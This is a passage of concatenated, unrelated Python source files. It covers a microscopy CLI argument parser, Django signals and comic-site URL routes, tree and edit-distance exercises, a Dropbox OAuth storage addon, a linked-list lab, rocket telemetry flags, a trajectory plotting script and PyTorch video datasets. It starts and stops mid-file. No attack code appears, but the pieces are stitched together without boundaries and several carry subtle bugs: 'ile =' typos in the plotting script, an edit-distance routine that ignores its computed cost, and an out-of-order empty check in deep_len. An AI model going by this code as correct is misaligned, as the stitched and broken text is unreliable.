default=2, help="Float, size of kernel for gaussian smoothing (x,y directions).", ) parser.add_argument( "--gaussian-kernel-z", dest="gaussian_kernel_z", type=float, default=6, help="Float, size of kernel for gaussian smoothing (zdirections).", ) parser.add_argument( "-pt", "--percentile_threshold", dest="percentile_threshold", type=float, default=99.995, help="Float in range [0, 100]. The percentile number of pixel " "intensity values for tresholding", ) parser.add_argument( "-tt", "--treshold-type", dest="threshold_type", type=str, default="otsu", help="'otsu' or 'percentile'. 
Determines how the threshold " "value is computed", ) parser.add_argument( "-or", "--overwrite-registration", dest="overwrite_registration", type=str, default="False", help="If false skip running again the registration", ) parser.add_argument( "--debug", dest="debug", action="store_true", help="Debug mode. Will increase verbosity of logging and save all " "intermediate files for diagnosis of software issues.", ) parser.add_argument( "--save-log", dest="save_log", action="store_true", help="Save logging to file (in addition to logging to terminal).", ) return parser 0 #signal fired after an obj is saved in this cas when a user is created from django.db.models.signals import post_save #user to sender the signal from django.contrib.auth.models import User #reciever of the signal from django.dispatch import receiver from .models import Profile @receiver(post_save,sender=User) def create_profile(sender,instance,created,**kwargs): ''' post_save:is the signal that is fired after and object is saved User:model is the sender of the signal receiver:is the create profile function that fetches the signal and performs some task instance:is the instance of User class created : if user was created Profile.objects.create(user=instance):create a profile obj with the instance of the user that was created ''' if created: Profile.objects.create(user=instance) @receiver(post_save,sender=User) def save_profile(sender,instance,**kwargs): ''' save profile once a user is saved ''' instance.profile.save() pennomi/comicscomics/urls.py from django.conf import settings from django.contrib import admin from django.urls import path, re_path from django.conf.urls.static import static from apps.comics import views as comics_views urlpatterns = [ path('', comics_views.ComicsIndexView.as_view(), name='index'), path('admin/', admin.site.urls), path('ads.txt', comics_views.AdsTxt.as_view(), name='ads-txt'), # path('robots.txt', comics_views.RobotsTxtView.as_view(), name='robots'), # path('sitemap.xml', comics_views.SitemapView.as_view(), name='sitemap'), # Comic root path('', comics_views.ReaderRedirectView.as_view(), name='reader-redirect'), path('comic/', comics_views.ReaderRedirectView.as_view(), name='reader-redirect'), path('comic/random/', comics_views.RandomReaderRedirectView.as_view(), name='random-reader-redirect'), # Legacy redirects re_path(r'^swords/', comics_views.LegacyPageRedirectView.as_view(), name='legacy-page-redirect'), # Reader path('comic/feed/', comics_views.FeedView.as_view(), name='feed'), # RSS Feed path('comic/data/', comics_views.ComicAjaxView.as_view(), name='comic-metadata'), path('comic/data//', comics_views.PageAjaxView.as_view(), name='page-metadata'), path('comic//', comics_views.ReaderView.as_view(), name='reader'), # Testing path('test/', comics_views.TestView.as_view(), name='test'), # Tag Wiki Pages path('archive/', comics_views.ArchiveView.as_view(), name='archive-index'), path('archive/pages/', comics_views.PageListView.as_view(), name='archive-pages'), path('archive//', comics_views.TagTypeView.as_view(), name='archive-tagtype'), path('archive///', comics_views.TagView.as_view(), name='archive-tag'), # Miscellaneous path('community/', comics_views.CommunityView.as_view(), name='community'), path('500/', comics_views.comic_500_view), ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) handler404 = comics_views.comic_404_view handler500 = comics_views.comic_500_view 1-10 #coding:utf-8 import sys if sys.getdefaultencoding() != 'utf-8': reload(sys) 
sys.setdefaultencoding('utf-8') from HistoryTrading import HistoryTrading from RealTimeTrading import RealTimeTrading from TestEngine import TestEngine __all__ = ['RealTimeTrading', 'HistoryTrading', 'TestEngine']pflun/learningAlgorithmsbuildTree.py # -*- coding: utf-8 -*- class TreeNode(object): def __init__(self, x): self.val = x self.left = None self.right = None class Solution(object): def buildTree(self, preorder, inorder): if len(preorder) == 0 or len(inorder) == 0 or len(preorder) != len(inorder): return [] res = self.buildTreeHelper(preorder, inorder, 0, 0, len(preorder) - 1) return res def buildTreeHelper(self, preorder, inorder, pre_st, in_st, in_end): if pre_st > len(preorder) or in_st > in_end: return None # first node in preorder is root root = TreeNode(preorder[pre_st]) i = in_st # find root in inorder, root is the first element in preorder while(i <= in_end): if inorder[i] == preorder[pre_st]: break i += 1 # left: pre start is the next element in preorder, i is curr root in inorder so in_end is at the left position of i root.left = self.buildTreeHelper(preorder, inorder, pre_st + 1, in_st, i - 1) # right: pre start is curr root (pre_st) + len(left child in inorder) + 1 (画图可见) root.right = self.buildTreeHelper(preorder, inorder, pre_st + (i - in_st + 1), i + 1, in_end) return root # My Accepted Solution class Solution2(object): def buildTree(self, preorder, inorder): if len(preorder) == 0 or len(inorder) == 0: return None curr = TreeNode(preorder[0]) index = inorder.index(preorder[0]) curr.left = self.buildTree(preorder[1:len(inorder[0:index]) + 1], inorder[0:index]) curr.right = self.buildTree(preorder[len(inorder[0:index]) + 1:], inorder[index + 1:]) return currmysite/myapp/models.py from django.db import models from django.contrib.auth.models import User from django.contrib.admin.widgets import AdminDateWidget, AdminTimeWidget, AdminSplitDateTime from django.forms import TextInput, Textarea # Create your models here. 
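# NOTE: illustrative sketch, not part of the original source. It
# restates the preorder/inorder reconstruction used by the buildTree
# solutions a little earlier in this dump (root is the first preorder
# element; everything left of it in inorder is the left subtree) as a
# standalone function with a small check. The _Node class and the values
# used here are hypothetical.

class _Node(object):
    def __init__(self, val):
        self.val = val
        self.left = None
        self.right = None

def build_from_orders_sketch(preorder, inorder):
    if not preorder:
        return None
    root = _Node(preorder[0])
    k = inorder.index(preorder[0])
    root.left = build_from_orders_sketch(preorder[1:k + 1], inorder[:k])
    root.right = build_from_orders_sketch(preorder[k + 1:], inorder[k + 1:])
    return root

# preorder [3, 9, 20, 15, 7] with inorder [9, 3, 15, 20, 7] gives a tree
# rooted at 3, left child 9, right child 20 (whose children are 15 and 7).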
class SuggestionModel(models.Model): suggestion = models.CharField(max_length=240) author = models.ForeignKey(User, on_delete=models.CASCADE) #new date_input = models.DateField(null=True) time_input = models.TimeField(null=True) def __str__(self): return self.suggestion class CommentModel(models.Model): comment = models.CharField(max_length=240) #new author = models.ForeignKey(User, on_delete=models.CASCADE) #new suggestion = models.ForeignKey(SuggestionModel, on_delete=models.CASCADE) def __str__(self): #new return self.comment import httplib as http import logging import os from oauthlib.common import generate_token from addons.base.models import (BaseOAuthNodeSettings, BaseOAuthUserSettings, BaseStorageAddon) from django.db import models from dropbox.dropbox import Dropbox from dropbox.exceptions import ApiError, DropboxException from dropbox.files import FolderMetadata from dropbox.client import DropboxOAuth2Flow from flask import request from framework.auth import Auth from framework.exceptions import HTTPError from framework.sessions import session from osf.models.external import ExternalProvider from osf.models.files import File, Folder, BaseFileNode from addons.base import exceptions from addons.dropbox import settings from addons.dropbox.serializer import DropboxSerializer from website.util import api_v2_url, web_url_for logger = logging.getLogger(__name__) class DropboxFileNode(BaseFileNode): _provider = 'dropbox' class DropboxFolder(DropboxFileNode, Folder): pass class DropboxFile(DropboxFileNode, File): pass class Provider(ExternalProvider): name = 'Dropbox' short_name = 'dropbox' client_id = settings.DROPBOX_KEY client_secret = settings.DROPBOX_SECRET # Explicitly override auth_url_base as None -- DropboxOAuth2Flow handles this for us auth_url_base = None callback_url = None handle_callback = None @property def oauth_flow(self): if 'oauth_states' not in session.data: session.data['oauth_states'] = {} if self.short_name not in session.data['oauth_states']: session.data['oauth_states'][self.short_name] = { 'state': generate_token() } return DropboxOAuth2Flow( self.client_id, self.client_secret, redirect_uri=web_url_for( 'oauth_callback', service_name=self.short_name, _absolute=True ), session=session.data['oauth_states'][self.short_name], csrf_token_session_key='state' ) @property def auth_url(self): ret = self.oauth_flow.start('force_reapprove=true') session.save() return ret # Overrides ExternalProvider def auth_callback(self, user): # TODO: consider not using client library during auth flow try: access_token, dropbox_user_id, url_state = self.oauth_flow.finish(request.values) except (DropboxOAuth2Flow.NotApprovedException, DropboxOAuth2Flow.BadStateException): # 1) user cancelled and client library raised exc., or # 2) the state was manipulated, possibly due to time. # Either way, return and display info about how to properly connect. return except (DropboxOAuth2Flow.ProviderException, DropboxOAuth2Flow.CsrfException): raise HTTPError(http.FORBIDDEN) except DropboxOAuth2Flow.BadRequestException: raise HTTPError(http.BAD_REQUEST) self.client = Dropbox(access_token) info = self.client.users_get_current_account() return self._set_external_account( user, { 'key': access_token, 'provider_id': info.account_id, 'display_name': info.name.display_name, } ) class UserSettings(BaseOAuthUserSettings): """Stores user-specific dropbox information. token. 
""" oauth_provider = Provider serializer = DropboxSerializer def revoke_remote_oauth_access(self, external_account): """Overrides default behavior during external_account deactivation. Tells Dropbox to remove the grant for the GakuNin RDM associated with this account. """ client = Dropbox(external_account.oauth_key) try: client.auth_token_revoke() except DropboxException: pass class NodeSettings(BaseOAuthNodeSettings, BaseStorageAddon): oauth_provider = Provider serializer = DropboxSerializer folder = models.TextField(null=True, blank=True) user_settings = models.ForeignKey(UserSettings, null=True, blank=True, on_delete=models.CASCADE) _api = None @property def api(self): """authenticated ExternalProvider instance""" if self._api is None: self._api = Provider(self.external_account) return self._api @property def folder_id(self): return self.folder @property def folder_name(self): return os.path.split(self.folder or '')[1] or '/ (Full Dropbox)' if self.folder else None @property def folder_path(self): return self.folder @property def display_name(self): return '{0}: {1}'.format(self.config.full_name, self.folder) def clear_settings(self): self.folder = None def get_folders(self, **kwargs): folder_id = kwargs.get('folder_id') if folder_id is None: return [{ 'addon': 'dropbox', 'id': '/', 'path': '/', 'kind': 'folder', 'name': '/ (Full Dropbox)', 'urls': { 'folders': api_v2_url('nodes/{}/addons/dropbox/folders/'.format(self.owner._id), params={'id': '/'} ) } }] client = Dropbox(self.external_account.oauth_key) try: folder_id = '' if folder_id == '/' else folder_id list_folder = client.files_list_folder(folder_id) contents = [x for x in list_folder.entries] while list_folder.has_more: list_folder = client.files_list_folder_continue(list_folder.cursor) contents += [x for x in list_folder.entries] except ApiError as error: raise HTTPError(http.BAD_REQUEST, data={ 'message_short': error.user_message_text, 'message_long': error.user_message_text, }) except DropboxException: raise HTTPError(http.BAD_REQUEST) return [ { 'addon': 'dropbox', 'kind': 'folder', 'id': item.path_display, 'name': item.path_display.split('/')[-1], 'path': item.path_display, 'urls': { 'folders': api_v2_url('nodes/{}/addons/dropbox/folders/'.format(self.owner._id), params={'id': item.path_display} ) } } for item in contents if isinstance(item, FolderMetadata) ] def set_folder(self, folder, auth): self.folder = folder # Add log to node self.nodelogger.log(action='folder_selected', save=True) def deauthorize(self, auth=None, add_log=True): """Remove user authorization from this node and log the event.""" folder = self.folder self.clear_settings() if add_log: extra = {'folder': folder} self.nodelogger.log(action='node_deauthorized', extra=extra, save=True) self.clear_auth() def serialize_waterbutler_credentials(self): if not self.has_auth: raise exceptions.AddonError('Addon is not authorized') return {'token': self.external_account.oauth_key} def serialize_waterbutler_settings(self): if not self.folder: raise exceptions.AddonError('Folder is not configured') return {'folder': self.folder} def create_waterbutler_log(self, auth, action, metadata): url = self.owner.web_url_for('addon_view_or_download_file', path=metadata['path'].strip('/'), provider='dropbox' ) self.owner.add_log( 'dropbox_{0}'.format(action), auth=auth, params={ 'project': self.owner.parent_id, 'node': self.owner._id, 'path': metadata['path'], 'folder': self.folder, 'urls': { 'view': url, 'download': url + '?action=download' }, }, ) def __repr__(self): return 
u''.format(self=self) ##### Callback overrides ##### def after_delete(self, node, user): self.deauthorize(Auth(user=user), add_log=True) self.save() def on_delete(self): self.deauthorize(add_log=False) self.save() from django import forms from .models import Driver class DriverForm(forms.ModelForm): class Meta: model = Driver fields = [ "first_name", "last_name", "birthday", ]class Solution: # @return an integer def minDistance(self, word1, word2): # Step 1: # Set n to be the length of word1; Set m to be the length of word2. # If n = 0, return m and exit. # If m = 0, return n and exit. # Construct a matrix containing 0...n rows and 0...m columns. # Step 2: # Initialize the first row to 0...n. # Initialize the first column to 0...m. # Step 3: # Examine each character of word1 (i from 1 to n). # Step 4: # Examine each character of word2 (j from 1 to m). # Step 5: # If word1[i] == word2[j], the cost = 0. # If word1[i] != word2[j], the cost = 1. # Step 6: # Set cell A [i, j] of the matrix equal to the minimum of: # a) The cell immediately above plus 1: A[i - 1, j] + 1. # b) The cell immediately to the left plus 1: A[i, j - 1] + 1. # c) The cell diagonally above and to the left plus the cost: A[i - 1, j - 1] + cost. # Step 7: # After the iteration steps (3, 4, 5, 6) are complete, the distance is found in cell A[n, m]. self.n = len(word1) self.m = len(word2) self.ar = {} for i in range(0,self.n+1): self.ar[i,0] = i for j in range(0,self.m+1): self.ar[0,j] = j # print self.ar for i in range(1,self.n+1): for j in range(1,self.m+1): l=word1[i-1] r=word2[j-1] # print i,j,l,r if l == r: self.cost = 0 else: self.cost=1 # print "diff"; # print self.cost,self.ar[i-1,j],self.ar[i-1,j-1],self.ar[i,j-1]; #self.ar[i,j]=min(min(self.ar[i,j-1]+1,self.ar[i-1,j]+1),self.ar[i-1,j-1]+self.cost) self.ar[i,j]=min(self.ar[i-1,j],self.ar[i-1,j-1],self.ar[i,j-1])+1 #print "VarLUE",self.ar[i,j],"COST",self.cost return self.ar[self.n,self.m] a=Solution() print "EDIT DISTANCE = ",a.minDistance('a','a')labs/lab08/lab08.py """ Lab 08: Midterm Review """ # Linked lists def deep_len(lnk): """ Returns the deep length of a possibly deep linked list. >>> deep_len(Link(1, Link(2, Link(3)))) 3 >>> deep_len(Link(Link(1, Link(2)), Link(3, Link(4)))) 4 >>> levels = Link(Link(Link(1, Link(2)), \ Link(3)), Link(Link(4), Link(5))) >>> print(levels) <<<1 2> 3> <4> 5> >>> deep_len(levels) 5 """ # Required lab questions are getting fewer and fewer.. # But you just have to do all the required ones :) if lnk.rest is Link.empty: return 1 if lnk is Link.empty: return 0 if isinstance(lnk.first, Link): return deep_len(lnk.first) + deep_len(lnk.rest) return 1 + deep_len(lnk.rest) # Link class class Link: """A linked list. 
>>> s = Link(1) >>> s.first 1 >>> s.rest is Link.empty True >>> s = Link(2, Link(3, Link(4))) >>> s.second 3 >>> s.first = 5 >>> s.second = 6 >>> s.rest.rest = Link.empty >>> s # Displays the contents of repr(s) Link(5, Link(6)) >>> s.rest = Link(7, Link(Link(8, Link(9)))) >>> s Link(5, Link(7, Link(Link(8, Link(9))))) >>> print(s) # Prints str(s) <5 7 <8 9>> """ empty = () def __init__(self, first, rest=empty): assert rest is Link.empty or isinstance(rest, Link) self.first = first self.rest = rest @property def second(self): return self.rest.first @second.setter def second(self, value): self.rest.first = value def __repr__(self): if self.rest is not Link.empty: rest_repr = ', ' + repr(self.rest) else: rest_repr = '' return 'Link(' + repr(self.first) + rest_repr + ')' def __str__(self): string = '<' while self.rest is not Link.empty: string += str(self.first) + ' ' self = self.rest return string + str(self.first) + '>'flag_lookup = [([0,0])] * 32 #assing list of 32 elements to represent 32 bits in flag string #list structure [flag level, flag name] flag_lookup[0] = ['state','USBMODE'] flag_lookup[1] = ['state','PREFLIGHT'] flag_lookup[2] = ['state','LAUNCH'] flag_lookup[3] = ['state','FLIGHT'] flag_lookup[4] = ['state','RECOVERY'] flag_lookup[5] = ['state','SETUP'] flag_lookup[6] = ['state','GROUNDSTATION'] flag_lookup[7] = ['info','DEBUG'] flag_lookup[8] = ['error','SPI'] flag_lookup[9] = ['error','I2C'] flag_lookup[10] = ['error','SERIAL'] flag_lookup[11] = ['error','LORA'] flag_lookup[12] = ['error','BARO'] flag_lookup[13] = ['error','BATT'] flag_lookup[14] = ['error','GPS'] flag_lookup[15] = ['error','IMU'] flag_lookup[16] = ['error','ESTIMATOR'] flag_lookup[17] = ['error','SD'] flag_lookup[18] = ['error','FLASH'] flag_lookup[19] = ['error','CAN'] flag_lookup[20] = ['error','ORIENTATION'] flag_lookup[21] = ['warn','BATT'] flag_lookup[22] = ['warn','PYRO1'] flag_lookup[23] = ['warn','PYRO2'] flag_lookup[24] = ['info','BOOST'] flag_lookup[25] = ['info','COAST'] flag_lookup[26] = ['info','APOGEE'] flag_lookup[27] = ['info','DROGUE CHUTE'] flag_lookup[28] = ['info','MAIN CHUTE'] #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Jan 19 12:13:05 2022 @author: dboateng Replace many of the codes with function....I am keeping it since I was just trying the individual model outputs """ import sys sys.path.append("/home/dboateng/Python_scripts/TrajView") from package.traj import Tra from package.traj_plot import Mapfigure, CartoFigure import os import matplotlib.pyplot as plt import numpy as np import cartopy.crs as ccrs # User specifications main_path="/home/dboateng/source_codes/lagranto/new/" exp_name_AW100E100 = "a002" exp_name_AW100E0 = "a003" exp_name_AW100E200 = "a001" exp_name_AW200E100 = "a009" exp_name_AW200E0 = "a010" exp_name_AW200E200 = "t017" # loc_1 = "Bologna" # lat_1 = 44.49 # lon_1 = 11.38 # loc_1 = "Graz" # lat_1 = 47.06 # lon_1 = 15.44 loc_1 = "Munich" lat_1 = 48.14 lon_1 = 11.53 # loc_1 = "Lyon" # lat_1 = 45.81 # lon_1 = 4.82 varname = "p" AW100E100_path_june = os.path.join(main_path, exp_name_AW100E100, "June", "Trace", loc_1) AW100E100_path_july = os.path.join(main_path, exp_name_AW100E100, "July", "Trace", loc_1) AW100E100_path_august = os.path.join(main_path, exp_name_AW100E100, "August", "Trace", loc_1) AW100E0_path_june = os.path.join(main_path, exp_name_AW100E0, "June", "Trace", loc_1) AW100E0_path_july = os.path.join(main_path, exp_name_AW100E0, "July", "Trace", loc_1) AW100E0_path_august = os.path.join(main_path, exp_name_AW100E0, "August", "Trace", 
loc_1) AW100E200_path_june = os.path.join(main_path, exp_name_AW100E200, "June", "Trace", loc_1) AW100E200_path_july = os.path.join(main_path, exp_name_AW100E200, "July", "Trace", loc_1) AW100E200_path_august = os.path.join(main_path, exp_name_AW100E200, "August", "Trace", loc_1) AW200E100_path_june = os.path.join(main_path, exp_name_AW200E100, "June", "Trace", loc_1) AW200E100_path_july = os.path.join(main_path, exp_name_AW200E100, "July", "Trace", loc_1) AW200E100_path_august = os.path.join(main_path, exp_name_AW200E100, "August", "Trace", loc_1) AW200E0_path_june = os.path.join(main_path, exp_name_AW200E0, "June", "Trace", loc_1) AW200E0_path_july = os.path.join(main_path, exp_name_AW200E0, "July", "Trace", loc_1) AW200E0_path_august = os.path.join(main_path, exp_name_AW200E0, "August", "Trace", loc_1) AW200E200_path_june = os.path.join(main_path, exp_name_AW200E200, "June", "Trace", loc_1) AW200E200_path_july = os.path.join(main_path, exp_name_AW200E200, "July", "Trace", loc_1) AW200E200_path_august = os.path.join(main_path, exp_name_AW200E200, "August", "Trace", loc_1) files = ["wcb_1.1", "wcb_2.1", "wcb_3.1", "wcb_4.1", "wcb_5.1","wcb_6.1", "wcb_7.1", "wcb_8.1","wcb_9.1", "wcb_10.1"] # combining trajectories #AW100E100 file = os.path.join(AW100E100_path_june, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E100_path_june, i)) for i in files] AW100E100_June_Trajs = trajs.concatenate(trajs_add) file = os.path.join(AW100E100_path_july, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E100_path_july, i)) for i in files] AW100E100_July_Trajs = trajs.concatenate(trajs_add) file = os.path.join(AW100E100_path_august, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E100_path_august, i)) for i in files] AW100E100_August_Trajs = trajs.concatenate(trajs_add) #AW100E0 file = os.path.join(AW100E0_path_june, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E0_path_june, i)) for i in files] AW100E0_June_Trajs = trajs.concatenate(trajs_add) ile = os.path.join(AW100E0_path_july, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E0_path_july, i)) for i in files] AW100E0_July_Trajs = trajs.concatenate(trajs_add) file = os.path.join(AW100E0_path_august, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E0_path_august, i)) for i in files] AW100E0_August_Trajs = trajs.concatenate(trajs_add) #AW100E200 file = os.path.join(AW100E200_path_june, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E200_path_june, i)) for i in files] AW100E200_June_Trajs = trajs.concatenate(trajs_add) ile = os.path.join(AW100E200_path_july, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E200_path_july, i)) for i in files] AW100E200_July_Trajs = trajs.concatenate(trajs_add) file = os.path.join(AW100E200_path_august, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E200_path_august, i)) for i in files] AW100E200_August_Trajs = trajs.concatenate(trajs_add) #AW200E200 file = os.path.join(AW200E200_path_june, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E200_path_june, i)) for i in files] AW200E200_June_Trajs = trajs.concatenate(trajs_add) ile = os.path.join(AW200E200_path_july, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E200_path_july, i)) for i in files] AW200E200_July_Trajs = trajs.concatenate(trajs_add) file = os.path.join(AW200E200_path_august, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E200_path_august, i)) for i in files] AW200E200_August_Trajs = 
trajs.concatenate(trajs_add) #AW200E100 file = os.path.join(AW200E100_path_june, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E100_path_june, i)) for i in files] AW200E100_June_Trajs = trajs.concatenate(trajs_add) ile = os.path.join(AW200E100_path_july, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E100_path_july, i)) for i in files] AW200E100_July_Trajs = trajs.concatenate(trajs_add) file = os.path.join(AW200E100_path_august, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E100_path_august, i)) for i in files] AW200E100_August_Trajs = trajs.concatenate(trajs_add) #AW200E0 file = os.path.join(AW200E0_path_june, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E0_path_june, i)) for i in files] AW200E0_June_Trajs = trajs.concatenate(trajs_add) ile = os.path.join(AW200E0_path_july, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E0_path_july, i)) for i in files] AW200E0_July_Trajs = trajs.concatenate(trajs_add) file = os.path.join(AW200E0_path_august, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E0_path_august, i)) for i in files] AW200E0_August_Trajs = trajs.concatenate(trajs_add) # apply font and style from package.traj_plot import apply_style apply_style(fontsize=22, style=None, linewidth=2) path_to_store = os.path.join("/home/dboateng/Model_output_pst/", "plots") levels = np.linspace(700, 900, 22) cmap = "Spectral" projection = ccrs.PlateCarree() cbar_pos = [0.90, 0.30, 0.03, 0.45] # #AW100E100 fig, ((ax1,ax2),(ax3, ax4), (ax5,ax6)) = plt.subplots(nrows = 3, ncols = 2, figsize=(22,18), subplot_kw={"projection": projection}) cbar_ax = fig.add_axes(cbar_pos) # axis for subplot colorbar # left, bottom, width, height cbar_ax.get_xaxis().set_visible(False) cbar_ax.yaxis.set_ticks_position('right') cbar_ax.set_yticklabels([]) cbar_ax.tick_params(size=0) #CTL m = CartoFigure(ax=ax1, projection=projection, extent=[-38,20,30,65], resolution="50m", bottom_labels=False) ax1.scatter(lon_1, lat_1, marker=(5, 0), color=("black"),) p =m.plot_trajs(AW100E100_June_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW100E100_July_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW100E100_August_Trajs, variable=varname, levels=levels, cmap=cmap) ax1.set_title("[A] CTL", fontsize=22, weight="bold", loc="left") #W1E0 m = CartoFigure(ax=ax3, projection=projection, extent=[-38,20,30,65], resolution="50m", bottom_labels=False) ax3.scatter(lon_1, lat_1, marker=(5, 0), color=("black"),) p =m.plot_trajs(AW100E0_June_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW100E0_July_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW100E0_August_Trajs, variable=varname, levels=levels, cmap=cmap) ax3.set_title("[C] W1E0", fontsize=22, weight="bold", loc="left") #W1E2 m = CartoFigure(ax=ax5, projection=projection, extent=[-38,20,30,65], resolution="50m",) ax5.scatter(lon_1, lat_1, marker=(5, 0), color=("black"),) p =m.plot_trajs(AW100E200_June_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW100E200_July_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW100E200_August_Trajs, variable=varname, levels=levels, cmap=cmap) ax5.set_title("[E] W1E2", fontsize=22, weight="bold", loc="left") #W2E1 m = CartoFigure(ax=ax2, projection=projection, extent=[-38,20,30,65], resolution="50m", bottom_labels=False, left_labels=False) ax2.scatter(lon_1, lat_1, marker=(5, 0), color=("black"),) p =m.plot_trajs(AW200E100_June_Trajs, variable=varname, 
levels=levels, cmap=cmap) m.plot_trajs(AW200E100_July_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW200E100_August_Trajs, variable=varname, levels=levels, cmap=cmap) ax2.set_title("[B] W2E1", fontsize=22, weight="bold", loc="left") #W2E0 m = CartoFigure(ax=ax4, projection=projection, extent=[-38,20,30,65], resolution="50m", bottom_labels=False, left_labels=False) ax4.scatter(lon_1, lat_1, marker=(5, 0), color=("black"),) p =m.plot_trajs(AW200E0_June_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW200E0_July_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW200E0_August_Trajs, variable=varname, levels=levels, cmap=cmap) ax4.set_title("[D] W2E0", fontsize=22, weight="bold", loc="left") #W2E0 m = CartoFigure(ax=ax6, projection=projection, extent=[-38,20,30,65], resolution="50m", left_labels=False) ax6.scatter(lon_1, lat_1, marker=(5, 0), color=("black"),) p =m.plot_trajs(AW200E200_June_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW200E200_July_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW200E200_August_Trajs, variable=varname, levels=levels, cmap=cmap) ax6.set_title("[F] W2E2", fontsize=22, weight="bold", loc="left") cb = plt.colorbar(p, drawedges=True, pad=0.10, shrink= 0.30, format= "%.0f", extend= "both", cax=cbar_ax) cb.set_label("Pressure [hPa]", size=22, fontweight= "bold") #fig.canvas.draw() plt.tight_layout() plt.subplots_adjust(left=0.05, right=0.89, top=0.94, bottom=0.06) # plt.savefig(os.path.join(path_to_store, "figS11.svg"), format= "svg", bbox_inches="tight", dpi=300) # plt.savefig(os.path.join(path_to_store, "figS11.png"), format= "png", bbox_inches="tight", dpi=300) plt.savefig(os.path.join(path_to_store, "figS12.svg"), format= "svg", bbox_inches="tight", dpi=300) plt.savefig(os.path.join(path_to_store, "figS12.png"), format= "png", bbox_inches="tight", dpi=300) # plt.savefig(os.path.join(path_to_store, "fig8.svg"), format= "svg", bbox_inches="tight", dpi=300) # plt.savefig(os.path.join(path_to_store, "fig8.png"), format= "png", bbox_inches="tight", dpi=300) # plt.savefig(os.path.join(path_to_store, "fig9.svg"), format= "svg", bbox_inches="tight", dpi=300) # plt.savefig(os.path.join(path_to_store, "fig9.png"), format= "png", bbox_inches="tight", dpi=300) VTP/utils/Datasets.py from numpy import load, newaxis, sort, uint8 import os import time from torch.utils.data import Dataset ''' Cilia dataset with overlapping clips of fixed length @param source directory containing the source videos @param clipLength length of each clip to be constructed @param transform transform to be performed on observations @author ''' class overlapDataset(Dataset): def __init__(self, source, clipLength, transform=None): self.source = source self.videos = os.listdir(source) sort(self.videos) self.clipLength = clipLength self.videoLengths = [load(source + '/' + self.videos[n],mmap_mode='r').shape[0] - clipLength + 1 for n in range(len(self.videos))] self.transform = transform def __len__(self): return sum(self.videoLengths) def __getitem__(self, index): tempIndex = index currVideo = -1 while(tempIndex >= 0): currVideo += 1 tempIndex -= self.videoLengths[currVideo] tempIndex += self.videoLengths[currVideo] obs = load(self.source + '/' + self.videos[currVideo],mmap_mode='r+')[tempIndex:tempIndex+self.clipLength] if self.transform: obs = self.transform(obs) return obs ''' Cilia dataset with non-overlapping clips of fixed length @param source directory containing the source videos @param clipLength length of each 
clip to be constructed @param transform transform to be performed on observations @author ''' class nonOverlapDataset(Dataset): def __init__(self, source, clipLength, transform=None): self.source = source self.videos = os.listdir(source) self.videos.sort() self.clipLength = clipLength self.videoLengths = [load(source + '/' + self.videos[n],mmap_mode='r').shape[0] // clipLength for n in range(len(self.videos))] self.transform = transform def __len__(self): return sum(self.videoLengths) def __getitem__(self, index): tempIndex = index currVideo = -1 while(tempIndex >= 0): currVideo += 1 tempIndex -= self.videoLengths[currVideo] tempIndex += self.videoLengths[currVideo] obs = load(self.source + '/' + self.videos[currVideo],mmap_mode='r+')[(tempIndex*self.clipLength):(tempIndex*self.clipLength)+self.clipLength] if self.transform: obs = self.transform(obs) return obs ''' Cilia dataset split into individual frames @param source directory containing the source videos @param transform transform to be performed on observations @author ''' class frameDataset(Dataset): def __init__(self, source, transform=None): self.source = source self.videos = os.listdir(source) self.videos.sort() self.videoLengths = [load(source + '/' + self.videos[n],mmap_mode='r').shape[0] for n in range(len(self.videos))] self.transform = transform def __len__(self): return sum(self.videoLengths) def __getitem__(self, index): tempIndex = index currVideo = -1 while(tempIndex >= 0): currVideo += 1 tempIndex -= self.videoLengths[currVideo] tempIndex += self.videoLengths[currVideo] obs = load(self.source + '/' + self.videos[currVideo],mmap_mode='r+')[tempIndex, :, :, newaxis] if self.transform: obs = self.transform(obs) return obs ''' Cilia dataset split into non-overlapping mxn windows of individual frames @param source directory containing the source videos @param m the height of each window @param n the width of each window @param transform transform to be performed on observations @author ''' class nonOverlapWindowDataset(Dataset): def __init__(self, source, m, n, transform=None): self.source = source print('Beginning construction!') self.videos = os.listdir(source) print('Sorting') self.videos.sort() self.windowHeight = m self.windowWidth = n self.videoLengths = [] total=len(self.videos) for i in range(total): array = load(source + '/' + self.videos[i],mmap_mode='r') self.videoLengths.append(array.shape[0] * (array.shape[1]//m) * (array.shape[2]//n)) print('Loading array: ',i+1,'/',total) self.transform = transform def __len__(self): return sum(self.videoLengths) def __getitem__(self, index): tempIndex = index currVideo = -1 while(tempIndex >= 0): currVideo += 1 tempIndex -= 